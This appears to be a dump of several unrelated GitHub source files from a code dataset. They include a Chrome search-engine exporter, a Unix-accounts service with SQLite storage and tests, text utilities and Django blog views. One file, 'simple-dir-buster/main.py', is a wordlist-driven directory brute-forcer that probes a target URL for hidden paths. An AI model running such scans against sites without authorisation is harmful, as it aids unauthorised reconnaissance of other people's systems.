docker_build += ' -t ' + base_name + '-' + folder + ':' + version
docker_build += ' ./src/containers/' + folder
success = execute_command(docker_build)
if not success:
break
[save_requirements('./src/functions/' + folder, ['boto3'], False) for folder in os.listdir('./src/functions/')
if os.path.isdir('./src/functions/' + folder) and '__pycache__' not in folder]
if success:
success = execute_command('sam build --template template.yml')
# success = execute_command('python setup.py sdist bdist_egg')
if success:
LOGGER.info('%s Successfully built artifact %s',
emojize(':white_heavy_check_mark:'),
emojize(':thumbs_up:'))
else:
LOGGER.error('%s Errors building artifact! %s',
emojize(':cross_mark:'),
emojize(':crying_face:'))
return True if success else False
if __name__ == '__main__':
raise SystemExit(0 if build() else 1)
``` |
{
"source": "1nFecT3D/searchEngines",
"score": 3
} |
#### File: 1nFecT3D/searchEngines/searchMe.py
```python
import os.path
import sqlite3
import re
import json
import click
def data_handler(data):
return_data = json.dumps(data, sort_keys=True, indent=4,
separators=(',', ': '))
print(return_data)
@click.command()
@click.option(
'--path',
default='~/Library/Application Support/Google/Chrome/Default/Web Data',
help="Path to Chrome's 'Web Data' Folder")
@click.option(
'--outfile',
default='se_from_chrome.json',
help="Output file")
def export(path, outfile):
path = os.path.expanduser(path)
conn = sqlite3.connect(path)
with conn:
try:
keywords = conn.execute('''select * from keywords''')
except sqlite3.OperationalError:
data_handler([{"success":False,"error":{"code":"010","message":"Is Chrome running? Must be closed to work."}}])
raise
search_engines = [{'name': kw[1], 'keyword': kw[2], 'url': kw[4]}
for kw in keywords if re.search(r'{searchTerms}', kw[4])]
output = json.dumps(search_engines, sort_keys=True, indent=4,
separators=(',', ': '))
with open(outfile, 'w') as w:
w.write(json.dumps([{'success':True,'payload':output,'error':'null'}], sort_keys=True, indent=4,
separators=(',', ': ')))
data_handler([{'success':True,'payload':output,'error':'null'}])
if __name__ == "__main__":
export()
``` |
{
"source": "1nfiniteloop/unix-accounts",
"score": 3
} |
#### File: unix_accounts/bin/auth_tokens.py
```python
import secrets
from typing import FrozenSet
class AuthorizationTokens:
def __init__(self, filename: str):
self._filename = filename
def get_tokens(self) -> FrozenSet[str]:
return self._read_tokens()
def generate_token(self) -> str:
token = secrets.token_urlsafe(32)
self._write_token(token)
return token
def _write_token(self, token: str):
with open(self._filename, "at") as file:
file.write(token)
file.write("\n")
def _read_tokens(self) -> FrozenSet[str]:
with open(self._filename, "r") as file:
return frozenset(self._token_gen(file))
def _token_gen(self, file):
lines = file.read()
for line in lines.split("\n"):
if (line):
yield line
```
#### File: unix_accounts/commandline/command_password.py
```python
import argparse
from getpass import getpass
from storage import UnixPasswordStorage
from .command import Command
class CommandPassword(Command):
def __init__(self, parser: argparse.ArgumentParser, password_storage: UnixPasswordStorage):
self._register_commands(parser)
self._parser = parser
self._password_storage = password_storage
@staticmethod
def _register_commands(parser: argparse.ArgumentParser):
parser.add_argument("name", type=str, nargs=1, help="User name")
def exec(self, args: argparse.Namespace):
cmd = CommandExec(args, self._password_storage)
cmd.exec()
class CommandExec:
def __init__(self, args: argparse.Namespace, password_storage: UnixPasswordStorage):
self._args = args
self._password_storage = password_storage
def exec(self):
new_password = getpass(prompt="New password: ")
self._password_storage.update(self._args.name[0], new_password)
```
#### File: unix_accounts/format/groups_asciitable.py
```python
from typing import (
Tuple,
)
from terminaltables import AsciiTable
from group import UnixGroup
def fmt_members(members: Tuple[str]):
return ",".join(members)
def fmt_groups(groups: Tuple[UnixGroup]):
return list([grp.name, grp.id, fmt_members(grp.members)] for grp in groups)
class GroupsAsciiTable:
def __init__(self, groups: Tuple[UnixGroup]):
self._groups = fmt_groups(groups)
def __str__(self):
HEADER = ("Group name", "Id", "User membership")
data = [HEADER]
data.extend(self._groups)
ascii_table = AsciiTable(data)
return ascii_table.table
```
#### File: unix_accounts/format/groups_json.py
```python
from typing import (
Dict
)
from group import UnixGroup
class JsonAttributeGroup:
name = "gr_name"
password = "<PASSWORD>"
gid = "gr_gid"
members = "gr_mem"
def _fmt_groups(unix_group: UnixGroup) -> Dict:
return {
JsonAttributeGroup.name: unix_group.name,
JsonAttributeGroup.password: "x",
JsonAttributeGroup.gid: unix_group.id,
JsonAttributeGroup.members: unix_group.members
}
class JsonFormatterGroup(dict):
def __init__(self, unix_group: UnixGroup):
super().__init__(_fmt_groups(unix_group))
```
#### File: unix_accounts/http_request/group_test.py
```python
from tornado.testing import AsyncHTTPTestCase
import tornado.web
import tornado.httputil
import tornado.escape
from unittest.mock import Mock
from error import DoesNotExist
from format import JsonAttributeGroup
from group import UnixGroup
from .group import (
HttpRequestGroup,
Parameter,
)
from storage import UnixGroupStorage
class Defaults:
unix_group = UnixGroup(
name="groupname",
id_=10000,
members=("first-user", "second-user")
)
class Mocks:
def __init__(self):
self.storage = Mock(spec=UnixGroupStorage)
class GroupsTest(AsyncHTTPTestCase):
API_ENDPOINT = "/api/groups"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._mocks = Mocks()
def setUp(self):
super().setUp()
self._mocks.storage.reset_mock()
def get_app(self):
return tornado.web.Application(
handlers=[
(self.API_ENDPOINT, HttpRequestGroup, dict(group_storage=self._mocks.storage)),
])
def test_get_all_groups(self):
self._mocks.storage.get_all.return_value = [
Defaults.unix_group,
Defaults.unix_group
]
response = self.fetch(self.API_ENDPOINT, method="GET")
decoded_response = tornado.escape.json_decode(response.body)
self.assertEqual(200, response.code)
self.assertIn("all", decoded_response)
self.assertEqual(len(decoded_response["all"]), 2, "Expects to return two groups")
def test_get_all_groups_when_non_existing(self):
self._mocks.storage.get_all.return_value = []
response = self.fetch(self.API_ENDPOINT, method="GET")
decoded_response = tornado.escape.json_decode(response.body)
self.assertEqual(200, response.code)
self.assertIn("all", decoded_response)
self.assertEqual(len(decoded_response["all"]), 0, "Expects to return empty list")
def test_get_group_by_invalid_id(self):
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
Parameter.USER_ID: "nan"
})
response = self.fetch(url, method="GET")
self.assertEqual(400, response.code)
def test_invalid_argument(self):
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
"invalid-attribute": "nan"
})
response = self.fetch(url, method="GET")
self.assertEqual(400, response.code)
def test_get_group_by_id(self):
self._mocks.storage.get_by_id.return_value = Defaults.unix_group
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
Parameter.USER_ID: "10000"
})
response = self.fetch(url, method="GET")
decoded_response = tornado.escape.json_decode(response.body)
self.assertEqual(200, response.code)
self._assert_attributes(decoded_response)
def test_get_group_by_name(self):
self._mocks.storage.get_by_name.return_value = Defaults.unix_group
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
Parameter.USER_NAME: "user"
})
response = self.fetch(url, method="GET")
decoded_response = tornado.escape.json_decode(response.body)
self.assertEqual(200, response.code)
self._assert_attributes(decoded_response)
def _assert_attributes(self, decoded_response):
self.assertEqual(Defaults.unix_group.id, decoded_response[JsonAttributeGroup.gid])
self.assertEqual(Defaults.unix_group.name, decoded_response[JsonAttributeGroup.name])
self.assertEqual(Defaults.unix_group.id, decoded_response[JsonAttributeGroup.gid])
self.assertSetEqual(set(Defaults.unix_group.members), set(decoded_response[JsonAttributeGroup.members]))
def test_get_non_existing_group_by_name(self):
self._mocks.storage.get_by_name = Mock(side_effect=DoesNotExist())
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
Parameter.USER_NAME: "user"
})
response = self.fetch(url, method="GET")
self.assertEqual(404, response.code)
def test_get_non_existing_group_by_gid(self):
self._mocks.storage.get_by_id = Mock(side_effect=DoesNotExist())
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
Parameter.USER_ID: "10000"
})
response = self.fetch(url, method="GET")
self.assertEqual(404, response.code)
```
#### File: unix_accounts/storage_sqlite/group_member_api.py
```python
import sqlalchemy.exc
from error import (
AlreadyExist,
DoesNotExist
)
from group import UnixGroup
from storage import UnixGroupMemberStorage
from .group_schema import Group
from .group_fmt import fmt_group
from .user_schema import User
from .sqlite_api import (
Database,
DatabaseApi
)
class UnixGroupMemberStorageSqlite(UnixGroupMemberStorage):
def __init__(self, db: Database):
self._db = DatabaseApi(db)
def add_member(self, user: str, group: str) -> UnixGroup:
group = self._try_add_member(*self._try_load_member(user, group))
return fmt_group(group)
def _try_add_member(self, user: User, group: Group) -> Group:
if user in group.user_membership:
raise AlreadyExist("User {user} is already member of {grp}".format(user=user.name, grp=group.name))
else:
group.user_membership.append(user)
self._db.update()
return group
def _try_load_member(self, user: str, group: str):
try:
group = self._db.get_one(Group, filters=(Group.name == group,))
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("Group {grp} does not exist".format(grp=group))
try:
user = self._db.get_one(User, filters=(User.name == user,))
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {user} does not exist".format(user=user))
return user, group
def delete_member(self, user: str, group: str) -> UnixGroup:
group = self._try_delete_member(*self._try_load_member(user, group))
return fmt_group(group)
def _try_delete_member(self, user: User, group: Group) -> Group:
if user in group.user_membership:
group.user_membership.remove(user)
self._db.update()
else:
raise DoesNotExist("User {user} is not a member of {grp}".format(user=user.name, grp=group.name))
return group
```
#### File: unix_accounts/storage_sqlite/sqlite_api.py
```python
import sqlalchemy.exc
import sqlalchemy.event
from sqlalchemy.orm.query import Query
from sqlalchemy.orm.session import Session
from sqlalchemy.orm import (
joinedload
)
from .db import Database
from .schema import SchemaBase
class DatabaseApi:
def __init__(self, database: Database):
self._database = database
@property
def _session(self) -> Session:
return self._database.session
def _query(self, cls, filters=(), preload=()) -> Query:
query = self._session.query(cls).options(joinedload(rel) for rel in preload)
if filters:
query = query.filter(*filters)
return query
def _commit(self):
try:
self._session.commit()
except sqlalchemy.exc.DatabaseError:
self._session.rollback()
raise
def get(self, cls, filters: tuple=(), preload: tuple=()) -> list:
return self._query(cls, filters, preload).all()
def get_one(self, cls, filters: tuple=(), preload: tuple=()):
return self._query(cls, filters, preload).one()
def add(self, item: SchemaBase):
self._session.add(item)
self._commit()
def add_all(self, items: list):
self._session.add_all(items)
self._commit()
# bulk updates: https://docs.sqlalchemy.org/en/latest/orm/query.html?highlight=update#sqlalchemy.orm.query.Query.update
# items_updated = self._query.filter(selector.filter).update(...)
def update(self):
self._commit()
def delete(self, cls, filters: tuple=()) -> bool:
rows = self._query(cls, filters).delete()
self._commit()
return rows > 0
def exists(self, cls, filters: tuple=()) -> bool:
rows = self._query(cls, filters).count()
return rows > 0
```
#### File: unix_accounts/storage_sqlite/user_api.py
```python
from typing import List, Tuple
import sqlalchemy.exc
from sqlalchemy.sql.expression import func
from error import (
DoesNotExist,
AlreadyExist,
)
from storage import UnixUserStorage
from user import UnixUser
from .group_fmt import fmt_group
from .group_schema import (
Group,
GroupId
)
from .password_schema import Password
from .user_schema import (
User,
UserId
)
from .sqlite_api import (
Database,
DatabaseApi
)
def _fmt_group_members(groups: Tuple[User]) -> Tuple[str]:
return tuple(group.name for group in groups)
def _fmt_user(user: User) -> UnixUser:
return UnixUser(
name=user.name,
uid=user.id,
group=fmt_group(user.group),
gecos=user.gecos,
home_dir=user.home_dir,
shell=user.shell,
group_membership=_fmt_group_members(user.group_membership)
)
class UnixUserStorageSqlite(UnixUserStorage):
def __init__(self, db: Database):
self._db = DatabaseApi(db)
@staticmethod
def _default_home(user_name: str) -> str:
return "/home/" + user_name
def add(self, name: str, uid: int = None, gid: int = None, gecos: str = None, home_dir: str = None, shell: str = None) -> UnixUser:
user = User()
user.name = name
user.user_id = UserId(id=uid)
user.shell = shell
user.gecos = gecos
if home_dir:
user.home_dir = home_dir
else:
user.home_dir = self._default_home(name)
if gid:
if self._db.exists(Group, filters=(Group.id == gid)):
user.gid = gid
else:
raise DoesNotExist("Group id {gid} does not exist".format(gid=gid))
else:
user.group = self._try_add_group(name, uid)
user.password = Password()
user.password.name = name
try:
self._db.add(user)
except sqlalchemy.exc.IntegrityError:
if uid:
msg = "User: \"{name}\" or uid: {uid} is not unique".format(name=name, uid=user.id)
else:
msg = "User: \"{name}\" is not unique".format(name=name)
raise AlreadyExist(msg)
return _fmt_user(user)
def _try_add_group(self, name: str, gid: int) -> Group:
# Try to favor uid == gid
group = Group()
group.name = name
if not self._db.exists(Group, filters=(Group.id == gid,)):
group.group_id = GroupId(id=gid)
else:
group.group_id = GroupId()
return group
def update_id(self, name: str, new_id: int) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,), preload=(User.user_id,))
user.user_id.id = new_id
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User id {name} does not exist".format(name=name))
except sqlalchemy.exc.IntegrityError:
raise AlreadyExist("User with id {uid} already exist".format(uid=new_id))
def update_gid(self, name: str, new_gid: int) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
user.gid = new_gid
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
except sqlalchemy.exc.IntegrityError:
raise DoesNotExist("Group id {gid} does not exist".format(gid=new_gid))
def update_name(self, name: str, new_name: str) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
user.name = new_name
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
except sqlalchemy.exc.IntegrityError:
raise AlreadyExist("User {name} already exist".format(name=new_name))
def update_gecos(self, name: str, new_gecos: str) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
user.gecos = new_gecos
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
def update_home_dir(self, name: str, new_home_dir: str) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
user.home_dir = new_home_dir
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
def update_shell(self, name: str, new_shell: str) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
user.shell = new_shell
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
def delete(self, name: str) -> bool:
try:
user = self._db.get_one(User, filters=(User.name == name,))
return self._db.delete(UserId, filters=(UserId.id == user.id,))
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
def get_by_id(self, uid: int) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.id == uid,))
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User with uid: {uid} does not exist".format(uid=uid))
def get_by_name(self, name: str) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User: {name} does not exist".format(name=name))
def get_all(self) -> List[UnixUser]:
users = self._db.get(User)
return [_fmt_user(user) for user in users]
```
#### File: src/unix_accounts/user.py
```python
from typing import Tuple
from group import UnixGroup
class UnixUser:
def __init__(self, name: str, uid: int = None, group: UnixGroup = None, gecos = None, home_dir: str = None, shell: str = None, group_membership: Tuple[str] = ()):
self._name = name
self._uid = uid
self._group = group
self._gecos = gecos
self._home_dir = home_dir
self._shell = shell
self._group_membership = group_membership
@property
def name(self) -> str:
return self._name
@property
def uid(self) -> int:
return self._uid
@property
def group(self) -> UnixGroup:
return self._group
@property
def gecos(self) -> str:
return self._gecos
@property
def home_dir(self) -> str:
return self._home_dir
@property
def shell(self) -> str:
return self._shell
@property
def group_membership(self) -> Tuple[str]:
return self._group_membership
``` |
{
"source": "1nhee/ACFWebApp",
"score": 3
} |
#### File: ACFWebApp/module/dbModule.py
```python
import pymysql
class Database():
def __init__(self):
self.db = pymysql.connect(host='acfwebapp.mysql.database.azure.com',
user='acfwebapp@acfwebapp',
db='userdb', password='<PASSWORD>', charset='utf8')
try:
with db.cursor() as cursor:
sql = """
CREATE TABLE test_table(
idx INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
name VARCHAR(256) NOT NULL,
nick VARCHAR(256) NOT NULL,
);
"""
cursor.execute(sql)
db.commit()
finally:
db.close()
``` |
{
"source": "1nn0/misc_utilities",
"score": 3
} |
#### File: misc_utilities/utilities/text.py
```python
import os
import re
def get_files(path, ext=None):
"""
Get all files in directory path, optionally with the specified extension
"""
if ext is None:
ext = ''
return [
os.path.abspath(fname)
for fname in os.listdir(path)
if os.path.isfile(fname)
if fname.endswith(ext)
]
def blob_text(filenames):
"""Create a blob of text by reading in all filenames into a string"""
return '\n'.join([open(filename).read() for filename in filenames])
def get_definition(text, startswith):
"""Parse text to retrieve the definitions that start with keyword"""
return [
re.split('[ ()]', line.strip())[1]
for line in [line.strip() for line in text.splitlines()]
if line.startswith(startswith)
]
def get_functions(text, startswith='def '):
"""Parse text to retrive the functions and methods defined"""
return get_definition(text, startswith)
def get_classes(text, startswith='class '):
"""Parse text to retrive the functions and methods defined"""
return get_definition(text, startswith)
def find_options(filename):
"""
Grab all of the ini style options in a specified file (ignoring sections)
"""
with open(filename) as fp:
text = [
line for line in fp.readlines()
if not line.startswith('#')
if '=' in line
]
return sorted(list(set(opt.split()[0] for opt in text)))
def find_functions(text):
"""Find all function names defined on all lines of the given text"""
return list(set([
re.split('[ (]*', line)[1]
for line in [
line.strip()
for line in text.splitlines()
if 'def ' in line
]
if line.startswith('def ')
]))
def find_missing_keywords(keywords, text):
"""
Return the subset of keywords which are missing from the given text
"""
found = set()
for key in keywords:
if key in text:
found.add(key)
return list(set(keywords) - found)
def glob_filepath(path, ext=None):
"""
Return all of the absolute filepaths in a given directory
Optionally, return only those that end with ``ext``
"""
if ext is None:
ext = ''
return [
os.path.abspath(os.path.join(path, f))
for f in os.listdir(path)
if f.endswith(ext)
]
def find_missing_functions(keywords, text):
"""
%timeit find_missing_funcs(funcs, text)
1 loops, best of 3: 973 ms per loop
"""
found = set()
for line in text.splitlines():
if not line.strip().startswith('def '):
for f in keywords:
if f in line:
found.add(f)
return list(set(keywords) - found)
def find_used_modules(modules, text):
"""
Given a list of modules, return the set of all those imported in text
"""
used = set()
for line in text.splitlines():
for mod in modules:
if 'import' in line and mod in line:
used.add(mod)
return used
def reverse_readline(filename, buf_size=8192):
"""a generator that returns the lines of a file in reverse order
Taken from srohde on Stack Overflow:
http://stackoverflow.com/a/23646049/450858
"""
with open(filename) as fh:
segment = None
offset = 0
fh.seek(0, os.SEEK_END)
total_size = remaining_size = fh.tell()
while remaining_size > 0:
offset = min(total_size, offset + buf_size)
fh.seek(-offset, os.SEEK_END)
buffer = fh.read(min(remaining_size, buf_size))
remaining_size -= buf_size
lines = buffer.split('\n')
# the first line of the buffer is probably not a complete line so
# we'll save it and append it to the last line of the next buffer
# we read
if segment is not None:
# if the previous chunk starts right from the beginning of line
# do not concact the segment to the last line of new chunk
# instead, yield the segment first
if buffer[-1] is not '\n':
lines[-1] += segment
else:
yield segment
segment = lines[0]
for index in range(len(lines) - 1, 0, -1):
yield lines[index]
yield segment
def grep(lines, pattern=None):
if pattern is None:
pattern = r''
regex = re.compile(pattern)
for line in lines:
if regex.search(line):
yield line
``` |
{
"source": "1nnr3d/simple-dir-buster",
"score": 2
} |
#### File: 1nnr3d/simple-dir-buster/main.py
```python
import requests
import urllib
from time import sleep
from threading import Thread
from colorama import Fore
def startDir():
print(Fore.BLUE + """
MMMMMMMMMMMMWNK0kxdoolllccclllodxk0KNWMMMMMMMMMMMM
MMMMMMMMMWX0xdllccclccccclllcccccllldx0XWMMMMMMMMM
MMMMMMWN0xollccccclllcccclllcccccccclclox0NWMMMMMM
MMMMMN0dlccccccccccccccccccccccccclcclcccld0NWMMMM
MMMWKxlcccccclodxkOOOOkxoollclccccccccccccclxKWMMM
MMNOoccccccldOXNNXKKKXXNXXKkolcccccccccclcccloONMM
MNklcccccld0NNK0KK0kxxxk0KXNXkolcccccccccccccclkNM
NklcccccldKWX0KXK0OxxxxxxxxONNOoccccccccccccccclkN
0oclcccco0WKOKXOxxxxxxxxxxxxONNklccccccccccccccco0
xlccccccdXN0kOOxxxxxxxxxxxxxkKW0occccccccccccccclx
occcccccdXW0xxxxxxxxxxxxxxxxkKW0occcccccccccccccco
llccccclo0WXkxxxxxxxxxxxxxxx0NNxlccccccccccccccccl
lcclccccld0NXOxxxxxxxxxxxxk0NNOlcccccccccccccccccl
llcclcccclokXNX0OkxxxkkOKXNWMNOdlcclllccccccccccll
occcccccclclok0XNXXXXXNXKK00XNXKdccclllcccccccccco
klccccccccclcclodxkkkxxdlllldOkl,.';cccclccccccclk
Xdlcccccccccccccccccccccllccllc'....';cccccccccldX
WKdlllccccccccccccccccccccclcccc;'....';cclcclldKW
MWKdlcccccccccccccccccccclccclcccc;'....,clccldKWM
MMWXklcccccclcccccccccccccccccccclcc;'';cccclkXWMM
MMMMN0dlcccccclccccccccccccccccccllcccccccld0NMMMM
MMMMMWN0xlclcccccccccccccccccccccclccclclx0NWMMMMM
MMMMMMMWNKkdllcccccccccccccccccccccllldkKNMMMMMMMM
MMMMMMMMMMWNKOkdollcccclcccccccllodkOKNWMMMMMMMMMM
MMMMMMMMMMMMMMWNKOxdolllcccllodxOKNWMMMMMMMMMMMMMM
\t\t\t\t\t github/1nnr3d
""")
urL = input("URL: ")
if "http://" in urL:
pass
elif "https://" in urL:
pass
elif len(urL) < 1:
raise Exception("Link Wrong or Missing!")
else:
urL = "http://" + urL
filePath = input("File Path: ")
if len(filePath) < 1:
raise Exception("File Path Wrong or Missing!")
print("-"*50)
Thread(target=fileRead, args=(urL,filePath)).start()
def fileRead(url,fp):
with open(fp, "r") as f:
words = f.readlines()
Thread(target=dir, args=(url,words)).start()
def dir(url,wrds):
if url[-1] != "/":
for w in wrds:
w = str(w).replace('\n','')
u = f"{url}/{w}"
r = requests.get(u, proxies=urllib.request.getproxies())
r = str(r).replace('<', '').replace('>', '').replace('Response ', '')
if "200" in r:
print(f"{u} : {r} + FOUND!")
else:
print(f"{u} : {r} ? ")
else:
for w in wrds:
w = str(w).replace('\n', '')
u = url + w
r = requests.get(u, proxies=urllib.request.getproxies())
r = str(r).replace('<','').replace('>','').replace('Response ', '')
if "200" in r:
print(f"{u} : {r} + FOUND!")
else:
print(f"{u} : {r} ? ")
sleep(2)
startDir()
``` |
{
"source": "1nolySk/Interval-Arithmetic",
"score": 3
} |
#### File: 1nolySk/Interval-Arithmetic/InterArith.py
```python
class Ia():
def __init__(self, a,b):
self.x = float(min(a,b))
self.y = float(max(a,b))
def __add__(self, ob):
if isinstance(ob, Ia):
return Ia(self.x+ob.x , self.y+ob.y)
return Ia(self.x+ob , self.y+ob)
def __sub__(self, ob):
if isinstance(ob, Ia):
return Ia(self.x-ob.y , self.y-ob.x)
return Ia(self.x-ob , self.y-ob)
def __rsub__(self, ob):
if isinstance(ob, Ia):
return Ia(ob.y - self.x, ob.x-self.y)
return Ia(ob-self.x , ob-self.y)
def __mul__(self, ob):
if isinstance(ob, Ia):
t= [self.x*ob.x,
self.y*ob.y,
self.x*ob.y,
self.y*ob.x]
return Ia(min(t), max(t))
t = [self.x*ob, self.y*ob]
return Ia(min(t), max(t))
def __truediv__(self, ob):
if isinstance(ob, Ia):
t= [self.x*(1/ob.x),
self.y*(1/ob.y),
self.x*(1/ob.y),
self.y*(1/ob.x)]
return Ia(min(t), max(t))
t= [self.x/ob , self.y/ob]
return Ia(min(t), max(t))
def __rtruediv__(self, ob):
if isinstance(ob, Ia):
t= [ob.x*(1/self.x),
ob.y*(1/self.y),
ob.x*(1/self.y),
ob.y*(1/self.x),]
return Ia(min(t), max(t))
t= [ob/self.x , ob/self.y]
return Ia(min(t), max(t))
def __eq__(self, ob):
if isinstance(ob, Ia):
if self.x == ob.x and self.y==ob.y:
return True
else:
if self.x == ob or self.y==ob:
return True
return False
def __str__(self):
return (f"[{self.x}, {self.y}]")
``` |
{
"source": "1nonlyabhi/icp-forum",
"score": 2
} |
#### File: icp-forum/blog/views.py
```python
from django.shortcuts import render, get_object_or_404, redirect
from blog.models import Post, Comment
from users.models import Follow
from notifications.models import Notification
from .forms import NewCommentForm
from django.views import View
from django.contrib import messages
from django.contrib.auth.models import User, Group
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.db.models import Count
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from users.decorators import allowed_users
decorators = [allowed_users(allowed_roles=['student', 'teacher']), login_required ]
def is_users(post_user, logged_user):
return post_user == logged_user
PAGINATION_COUNT = 10
def welcome(request):
if request.user.is_authenticated:
return redirect('blog-home')
return render(request,'blog/welcome.html')
def privacy_policy(request):
return render(request,'blog/privacy_policy.html')
def cookies(request):
return render(request,'blog/cookies.html')
@method_decorator(decorators, name='dispatch')
class PostListView(LoginRequiredMixin, ListView):
model = Post
template_name = 'blog/home.html'
context_object_name = 'posts'
ordering = ['-date_posted']
paginate_by = PAGINATION_COUNT
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
all_users = []
data_counter = Post.objects.values('author').annotate(author_count=Count('author')).order_by('-author_count')[:6]
for aux in data_counter:
all_users.append(User.objects.filter(pk=aux['author']).first())
context['all_users'] = all_users
return context
def get_queryset(self):
user = self.request.user
queryset = Follow.objects.filter(user=user)
follows = [user]
for obj in queryset:
follows.append(obj.follow_user)
return Post.objects.filter(author__in=follows).order_by('-date_posted')
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class UserPostListView(LoginRequiredMixin, ListView):
model = Post
template_name = 'blog/user_posts.html'
context_object_name = 'posts'
paginate_by = PAGINATION_COUNT
def visible_user(self):
return get_object_or_404(User, username=self.kwargs.get('username'))
def get_context_data(self, **kwargs):
visible_user = self.visible_user()
logged_user = self.request.user
if logged_user.username == '' or logged_user is None:
can_follow = False
else:
can_follow = (Follow.objects.filter(user=logged_user, follow_user=visible_user).count() == 0)
context = super().get_context_data(**kwargs)
context['user_profile'] = visible_user
context['can_follow'] = can_follow
return context
def get_queryset(self):
user = self.visible_user()
return Post.objects.filter(author=user).order_by('-date_posted')
def post(self, request, *args, **kwargs):
if request.user.id is not None:
profile = self.visible_user()
follows_between = Follow.objects.filter(user=request.user, follow_user=self.visible_user())
if 'follow' in request.POST:
new_relation = Follow(user=request.user, follow_user=self.visible_user())
if follows_between.count() == 0:
new_relation.save()
notification = Notification.objects.create(notification_type=3, from_user=request.user, to_user=self.visible_user())
elif 'unfollow' in request.POST:
if follows_between.count() > 0:
follows_between.delete()
return self.get(self, request, *args, **kwargs)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class PostDetailView(LoginRequiredMixin, DetailView):
model = Post
template_name = 'blog/post_detail.html'
context_object_name = 'post'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
comments_connected = Comment.objects.filter(post_connected=self.get_object()).order_by('-date_posted')
context['comments'] = comments_connected
context['form'] = NewCommentForm(instance=self.request.user)
return context
def post(self, request, pk, *args, **kwargs):
post = Post.objects.get(pk=pk)
new_comment = Comment(content=request.POST.get('content'),
attachedurl=request.POST.get('attachedurl'),
author=self.request.user,
post_connected=self.get_object())
new_comment.save()
notification = Notification.objects.create(notification_type=2, from_user=request.user, to_user=post.author, post=post)
messages.success(request, 'Comment successfully submitted')
return self.get(self, request, *args, **kwargs)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Post
template_name = 'blog/post_delete.html'
context_object_name = 'post'
success_url = '/'
def test_func(self):
return is_users(self.get_object().author, self.request.user)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class PostCreateView(LoginRequiredMixin, CreateView):
model = Post
fields = ['content', 'attachedurl', 'attachedimage']
template_name = 'blog/post_new.html'
success_url = '/'
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['tag_line'] = 'Add new post'
return data
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Post
fields = ['content', 'attachedurl', 'attachedimage']
template_name = 'blog/post_new.html'
success_url = '/'
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().author, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit post'
return context
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class FollowsListView(ListView):
model = Follow
template_name = 'blog/follow.html'
context_object_name = 'follows'
def visible_user(self):
return get_object_or_404(User, username=self.kwargs.get('username'))
def get_queryset(self):
user = self.visible_user()
return Follow.objects.filter(user=user).order_by('-date')
def get_context_data(self, *, object_list=None, **kwargs):
context = super().get_context_data(**kwargs)
context['follow'] = 'follows'
return context
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class FollowersListView(ListView):
model = Follow
template_name = 'blog/follow.html'
context_object_name = 'follows'
def visible_user(self):
return get_object_or_404(User, username=self.kwargs.get('username'))
def get_queryset(self):
user = self.visible_user()
return Follow.objects.filter(follow_user=user).order_by('-date')
def get_context_data(self, *, object_list=None, **kwargs):
context = super().get_context_data(**kwargs)
context['follow'] = 'followers'
return context
# ==================================Post Like Functionality=============================
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class AddLike(LoginRequiredMixin, View):
def post(self, request, pk, *args, **kwargs):
post = Post.objects.get(pk=pk)
if post.dislikes.filter(id=request.user.id).exists():
post.dislikes.remove(request.user)
